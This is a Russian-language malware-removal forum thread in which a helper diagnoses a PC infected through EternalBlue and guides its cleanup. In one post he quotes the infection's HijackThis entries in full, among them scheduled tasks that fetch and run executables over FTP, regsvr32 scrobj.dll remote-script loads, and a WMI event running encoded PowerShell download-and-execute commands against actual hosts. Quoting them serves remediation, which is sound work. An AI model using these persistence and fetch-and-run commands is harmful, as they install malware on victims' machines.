Показано с 1 по 11 из 11.

lsmosee.exe и update.exe при загрузке (заявка № 222271)

  1. #1
    Junior Member Репутация
    Регистрация
    13.03.2012
    Сообщений
    5
    Вес репутации
    26

    lsmosee.exe и update.exe при загрузке

    При загрузке в карантин Авиры попадают эти файлы:
    C:\Windows\update.exe
    C:\Windows\Help\lsmosee.exe
    Вложения Вложения

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Cyber Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Info_bot
    Регистрация
    11.05.2011
    Сообщений
    2,310
    Вес репутации
    350
    Уважаемый(ая) FGlock, спасибо за обращение на наш форум!

    Помощь при заражении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы, в самое ближайшее время, ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

    information

    Информация

    Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.





    Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

  4. #3
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    29,703
    Вес репутации
    909
    Запустите HijackThis, расположенный в папке Autologger (в Windows Vista/7/8/10 необходимо запускать через правую кнопку мыши Запуск от имени администратора)пофиксите только эти строки:
    Код:
    O4 - MSConfig\startupreg: start [command] = C:\Windows\system32\regsvr32.exe /u /s /i:http://js.1226bye.xyz:280/v.sct scrobj.dll (HKLM) (2019/02/23)
    O7 - IPSec: Name: win (2019/03/11) - {ccb7a3db-9985-4e4e-9634-3793ce36ed23} - Source: Any IP - Destination: my IP (Port 135 TCP) (mirrored) - Action: Block
    O7 - IPSec: Name: win (2019/03/11) - {ccb7a3db-9985-4e4e-9634-3793ce36ed23} - Source: Any IP - Destination: my IP (Port 137 TCP) (mirrored) - Action: Block
    O7 - IPSec: Name: win (2019/03/11) - {ccb7a3db-9985-4e4e-9634-3793ce36ed23} - Source: Any IP - Destination: my IP (Port 138 TCP) (mirrored) - Action: Block
    O7 - IPSec: Name: win (2019/03/11) - {ccb7a3db-9985-4e4e-9634-3793ce36ed23} - Source: Any IP - Destination: my IP (Port 139 TCP) (mirrored) - Action: Block
    O7 - IPSec: Name: win (2019/03/11) - {ccb7a3db-9985-4e4e-9634-3793ce36ed23} - Source: Any IP - Destination: my IP (Port 445 TCP) (mirrored) - Action: Block
    O22 - Task: Mysa - C:\Windows\system32\cmd.exe /c echo open ftp.1226bye.xyz>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe
    O22 - Task: Mysa1 - C:\Windows\system32\rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa
    O22 - Task: Mysa2 - C:\Windows\system32\cmd.exe /c echo open ftp.1226bye.xyz>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p
    O22 - Task: Mysa3 - C:\Windows\system32\cmd.exe /c echo open ftp.1226bye.xyz>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe
    O22 - Task: ok - C:\Windows\system32\rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa
    O25 - WMI Event: fuckyoumm4 - fuckyoumm3 - Event="__InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'",  cmd /c powershell.exe -nop -enc "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB0ACAAJwBbAFwAcgBcAG4AXQArACcAfAAlAHsAJABuAD0AJABfAC4AcwBwAGwAaQB0ACgAJwAvACcAKQBbAC0AMQBdADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAXwAsACAAJABuACkAOwBzAHQAYQByAHQAIAAkAG4AOwB9AA=="&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1217bye.host/S.ps1')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://173.208.139.170/s.txt')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://35.182.171.137/s.jpg')||regsvr32 /u /s /i:http://wmi.1217bye.host:8888/1.txt scrobj.dll&regsvr32 /u /s /i:http://173.208.139.170/2.txt scrobj.dll&regsvr32 /u /s /i:http://35.182.171.137/3.txt scrobj.dll
    Загрузите, распакуйте на Рабочий стол и запустите SecurityCheck by glax24 & Severnyj.
    Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запуск от имени администратора (если Вы используете Windows Vista/7/8/10).
    Если увидите предупреждение от фаервола относительно программы SecurityCheck, не блокируйте ее работу.
    Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt;
    Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt.

    Приложите этот файл к своему следующему сообщению.

    Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

    Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
    Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

    Нажмите кнопку Scan.
    После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
    Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).
    WBR,
    Vadim

  5. #4
    Junior Member Репутация
    Регистрация
    13.03.2012
    Сообщений
    5
    Вес репутации
    26
    SecurityCheck.exe не смог запустить с рабочего стола, запустился с другого диска
    Вложения Вложения

  6. #5
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    29,703
    Вес репутации
    909
    Автоматическое обновление отключено
    Дата установки обновлений: 2016-03-17 10:41:36
    Центр обновления Windows (wuauserv) - Служба остановлена
    Систему долбят через уязвимость, закрытую Microsoft ещё в апреле 2017 года.
    Брандмауэр Windows (MpsSvc) - Служба остановлена
    Отключен доменный профиль Брандмауэра Windows
    Отключен общий профиль Брандмауэра Windows
    Отключен частный профиль Брандмауэра Windows
    Плюс ещё и брандмауэр выключен.
    ------------------------------- [ HotFix ] --------------------------------
    HotFix KB3115858 Внимание! Скачать обновления
    HotFix KB3140735 Внимание! Скачать обновления
    HotFix KB3138910 Внимание! Скачать обновления
    HotFix KB3145739 Внимание! Скачать обновления
    HotFix KB3146963 Внимание! Скачать обновления
    HotFix KB3156013 Внимание! Скачать обновления
    HotFix KB3156016 Внимание! Скачать обновления
    HotFix KB3156019 Внимание! Скачать обновления
    HotFix KB3155178 Внимание! Скачать обновления
    HotFix KB3153171 Внимание! Скачать обновления
    HotFix KB3170455 Внимание! Скачать обновления
    HotFix KB3178034 Внимание! Скачать обновления
    HotFix KB3185911 Внимание! Скачать обновления
    HotFix KB3184122 Внимание! Скачать обновления
    HotFix KB3192391 Внимание! Скачать обновления
    HotFix KB3197867 Внимание! Скачать обновления
    HotFix KB3205394 Внимание! Скачать обновления
    HotFix KB4012212 Внимание! Скачать обновления
    HotFix KB4019263 Внимание! Скачать обновления
    HotFix KB4022722 Внимание! Скачать обновления
    HotFix KB4015546 Внимание! Скачать обновления
    HotFix KB4025337 Внимание! Скачать обновления
    HotFix KB4034679 Внимание! Скачать обновления
    HotFix KB4041678 Внимание! Скачать обновления
    Устанавливайте, это только критические хотфиксы, включая KB4012212, который закрывает опаснейшую уязвимость, используемую в т. ч. нашумевшими в 2017 году шифровальщики WannaCry и Petya/NotPetya, а также многими майнерами и троянами, в т. ч. и вашими. Не закроете дыры - не решите проблему. Имейте ввиду, что источник заражения - на других компютерах в локальной сети.
    Проверьте сеть утилитой ETERNAL BLUES, все найденные компьютеры с уязвимостью также надо обновлять и проверять на трояны.

    Avira Desktop (выключен и устарел)
    Ещё и антивирус, похоже, не обновлён.

    Удалите все установленные версии Java, они устаревшие и со множеством критических уязвимостей.
    Если Java вообще нужна для каких- либо приложений, игр (и Вы точно знаете, для каких именно) - установите текущий билд Java 8.
    Учтите, что 64-bit версия Java нужна только для очень ограниченного круга программ, и, как правило, не нужна вообще.

    Откройте Блокнот (Старт =>Программы => Стандартные => Блокнот). Скопируйте в него следующий код:
    Код:
    CreateRestorePoint:
    CHR Profile: C:\Users\FGlock\AppData\Local\Google\Chrome\User Data\System Profile [2019-03-09]
    CHR HKLM-x32\...\Chrome\Extension: [necfmkplpminfjagblfabggomdpaakan] - hxxp://clients2.google.com/service/update2/crx
    U3 arjybdcz; C:\Windows\System32\Drivers\arjybdcz.sys [0 ]Microsoft Corporation<==== ATTENTION (zero byte File/Folder)
    Virustotal: C:\Windows\System32\Drivers\arjybdcz.sys
    Virustotal: C:\Windows\update.exe
    Virustotal: C:\Windows\system32\max.exe
    C:\Windows\System32\Drivers\arjybdcz.sys
    2019-03-12 18:13 - 2019-03-12 18:14 - 000662528 _____ (Zhuhai Kingsoft Office Software Co.,Ltd) C:\Windows\update.exe
    2019-03-11 19:38 - 2019-03-11 19:39 - 000662528 _____ (Zhuhai Kingsoft Office Software Co.,Ltd) C:\Windows\system32\max.exe
    2019-03-09 10:09 - 2019-03-09 10:09 - 000662528 _____ (Zhuhai Kingsoft Office Software Co.,Ltd) C:\Windows\update.exe.VIR
    2019-02-13 19:25 - 2019-02-13 19:25 - 000000000 _____ C:\Windows\system32\Tmp6C0A.tmp
    2019-03-12 18:13 - 2019-02-03 17:32 - 000000080 _____ C:\Windows\system32\s
    2019-03-12 18:13 - 2019-02-03 17:32 - 000000078 _____ C:\Windows\system32\ps
    2019-03-12 18:13 - 2019-02-03 17:32 - 000000076 _____ C:\Windows\system32\p
    2019-03-11 19:39 - 2019-02-03 20:39 - 000533358 _____ C:\Windows\system32\a.txt
    2019-03-11 19:39 - 2019-02-03 20:39 - 000008732 _____ C:\Windows\system32\c.txt
    2019-03-11 19:39 - 2019-02-03 17:00 - 000221184 _____ (TODO: <公司名>) C:\Windows\system32\upsupx.exe
    ContextMenuHandlers1-x32: [MRAICQCMenu] -> {7C9E7B90-88EC-4852-AC7A-C938268A5D04} => C:\Users\FGlock\AppData\Roaming\ICQM\ICQ\dll\mramenu.dll -> No File
    AlternateDataStreams: C:\ProgramData\TEMP:56E2E879 [246]
    AlternateDataStreams: C:\ProgramData\TEMP:9341E0C6 [166]
    AlternateDataStreams: C:\ProgramData\TEMP:D8999815 [149]
    FirewallRules: [{D731A4D8-0F0A-43C6-AFBA-D64204AEB725}] => (Block) LPort=445
    FirewallRules: [{D3A7EA89-21FA-426B-8C96-7825B2EEBA53}] => (Block) LPort=139
    Folder: C:\Windows\Help
    Reboot:
    и сохраните как fixlist.txt в папку с Farbar Recovery Scan Tool. При сохранении выберите кодировку Юникод!
    Отключите до перезагрузки антивирус, закройте все браузеры, запустите FRST.EXE/FRST64.EXE, нажмите один раз Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
    Компьютер будет перезагружен автоматически.

    Сообщите, что с проблемой.
    WBR,
    Vadim

  7. #6
    Junior Member Репутация
    Регистрация
    13.03.2012
    Сообщений
    5
    Вес репутации
    26
    1. Центр обновления Windows - включен

    2. Брандмауэр Windows - включен

    3. Установлены только эти обновления, так как остальных на сайте вроде больше нет
    HotFix KB3197867 Внимание! Скачать обновления
    HotFix KB3205394 Внимание! Скачать обновления
    HotFix KB4012212 Внимание! Скачать обновления
    HotFix KB4019263 Внимание! Скачать обновления
    HotFix KB4022722 Внимание! Скачать обновления
    HotFix KB4015546 Внимание! Скачать обновления
    HotFix KB4025337 Внимание! Скачать обновления
    HotFix KB4034679 Внимание! Скачать обновления
    HotFix KB4041678 Внимание! Скачать обновления

    4. Avira Desktop действительно перестал обновляться. Нужно заменить, какой антивирус посоветуете
    ESET NOD32
    Avast! AntiVirus Free 2019
    Dr.Web CureIt!
    все с постоянными обновлениями

    5. Java удалена

    6. Авира не ругается больше и в карантин ничего не кидает
    Вложения Вложения

  8. #7
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    29,703
    Вес репутации
    909
    Дочистим остатки.
    Примените такой fixlist.txt в FRST64:
    2019-03-12 14:37 - 2019-03-12 14:37 - 000662528 ____A [BC7FC83CE9762EB97DC28ED1B79A0A10] (Zhuhai Kingsoft Office Software Co.,Ltd) C:\Windows\Help\lsmosee.exe
    2019-03-09 10:09 - 2019-03-09 10:09 - 000662528 ____A [BC7FC83CE9762EB97DC28ED1B79A0A10] (Zhuhai Kingsoft Office Software Co.,Ltd) C:\Windows\Help\lsmosee.exe.VIR
    Новый Fixlog.txt приложите.

    Выбор антивирусов странный несколько. Dr.Web CureIt! - это не антивирус, а утилита лечения, обновить можно только скачав новую, постоянную защиту в принципе не обеспечивает.

    ESET NOD32 и Avast! AntiVirus Free 2019 - выбор между платным и бесплатным продуктом даёт дополнительные вопросы, например, Eset не спиратить ли хотите? Он однозначно лучше Avast, но по честному, Kaspersky Free дешевле и не хуже ИМХО.

    В локальной сети ещё один компьютер найден с ip 192.168.1.111, но он без уязвимости EternalBlue. Ваш, случаем, не открыт из интернета?
    WBR,
    Vadim

  9. #8
    Junior Member Репутация
    Регистрация
    13.03.2012
    Сообщений
    5
    Вес репутации
    26
    Добрый день!
    Dr. Web нашел и обезвредил 157 угроз в том числе

    Код:
    "13.03.2019 2:07","Сканер","Обнаружена угроза","Объект: <span class="path" >lsmosee.exe</span>","Угроза: Trojan.NtRootKit.19689","Действие: Удалено","Путь: <span class="path" >C:\Windows\Help\lsmosee.exe</span>"
    "13.03.2019 2:07","Сканер","Обнаружена угроза","Объект: <span class="path" >lsmosee.exe.VIR</span>","Угроза: Trojan.NtRootKit.19689","Действие: Удалено","Путь: <span class="path" >C:\Windows\Help\lsmosee.exe.VIR</span>"
    
    "13.03.2019 1:29","SpIDer Guard","Обнаружена угроза","","","","","hosts","","","DFH:HOSTS.corrupted","Вылечено","C:\Windows\system32\drivers\etc\hosts","","","","","","","","","","","","","","","","","","","","","","","","",""
    "13.03.2019 1:14","Сканер","Обнаружена угроза","","","",""," MBR","","","Trojan.NtRootKit.19689","Вылечено","HDD0: MBR","","","","","","","","","","","","","","","","","","","","","","","","",""
    
    	Line 143: "13.03.2019 1:44","Сканер","Обнаружена угроза","Объект: <span class="path" >update.exe.VIR.xBAD</span>","Угроза: Trojan.NtRootKit.19689","Действие: Удалено","Путь: <span class="path" >C:\FRST\Quarantine\C\Windows\update.exe.VIR.xBAD</span>"
    	Line 143: "13.03.2019 1:44","Сканер","Обнаружена угроза","Объект: <span class="path" >update.exe.VIR.xBAD</span>","Угроза: Trojan.NtRootKit.19689","Действие: Удалено","Путь: <span class="path" >C:\FRST\Quarantine\C\Windows\update.exe.VIR.xBAD</span>"
    	Line 144: "13.03.2019 1:44","Сканер","Обнаружена угроза","Объект: <span class="path" >update.exe.xBAD</span>","Угроза: Trojan.NtRootKit.19689","Действие: Удалено","Путь: <span class="path" >C:\FRST\Quarantine\C\Windows\update.exe.xBAD</span>"
    	Line 144: "13.03.2019 1:44","Сканер","Обнаружена угроза","Объект: <span class="path" >update.exe.xBAD</span>","Угроза: Trojan.NtRootKit.19689","Действие: Удалено","Путь: <span class="path" >C:\FRST\Quarantine\C\Windows\update.exe.xBAD</span>"
    При повторе сканирования вроде ничего не находит. Все неподписанные соединения заблочил брандмауром веба.

    Этот код применять?
    Примените такой fixlist.txt в FRST64:
    Что значит открыт из интернета?
    В локальной сети ещё один компьютер найден с ip 192.168.1.111, но он без уязвимости EternalBlue. Ваш, случаем, не открыт из интернета?
    192.168.1.100 (зараженный) был прописан в DMZ на роутере. DMZ отключил.

  10. #9
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    29,703
    Вес репутации
    909
    Цитата Сообщение от FGlock Посмотреть сообщение
    Dr. Web нашел и обезвредил 157 угроз в том числе
    ... то, что я собирался дочистить в FRST, теперь уже не надо.
    Цитата Сообщение от FGlock Посмотреть сообщение
    Что значит открыт из интернета?

    192.168.1.100 (зараженный) был прописан в DMZ на роутере. DMZ отключил.
    Вот именно это и значит. Аналогия - вы открыли дверь в доме нараспашку, отключили сигнализацию. Хорошо ещё, не зашифровали всё подряд.

    Переименуйте FRST64.EXE в uninstall.exe и запустите, компьютер перезагрузится.
    WBR,
    Vadim

  11. #10
    Junior Member Репутация
    Регистрация
    13.03.2012
    Сообщений
    5
    Вес репутации
    26
    Большое спасибо!

    Еще вопрос. Dr. Web постоянно требует создать правило для chrome.exe, на разные порты, то входящие то исходящие. Их и должно быть так много? Стоит ли разрешать проверенным приложениям любые подключения?

  12. #11
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    29,703
    Вес репутации
    909
    WBR,
    Vadim

Похожие темы

  1. Ответов: 9
    Последнее сообщение: 25.03.2018, 19:29
  2. Ответов: 2
    Последнее сообщение: 06.02.2018, 07:06
  3. Появляются вирусы BlackGen2, crypt xpack gen, Lsmosee.exe.
    От James_Wayne в разделе Помогите!
    Ответов: 10
    Последнее сообщение: 29.10.2017, 23:44
  4. Вирусные файлы lsmos.exe , lsmosee.exe , mysa 1,2,3 и ok.
    От LastMan в разделе Помогите!
    Ответов: 2
    Последнее сообщение: 16.08.2017, 21:59
  5. Ответов: 1
    Последнее сообщение: 01.05.2010, 21:14

Свернуть/Развернуть Ваши права в разделе

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  
Page generated in 0.00547 seconds with 20 queries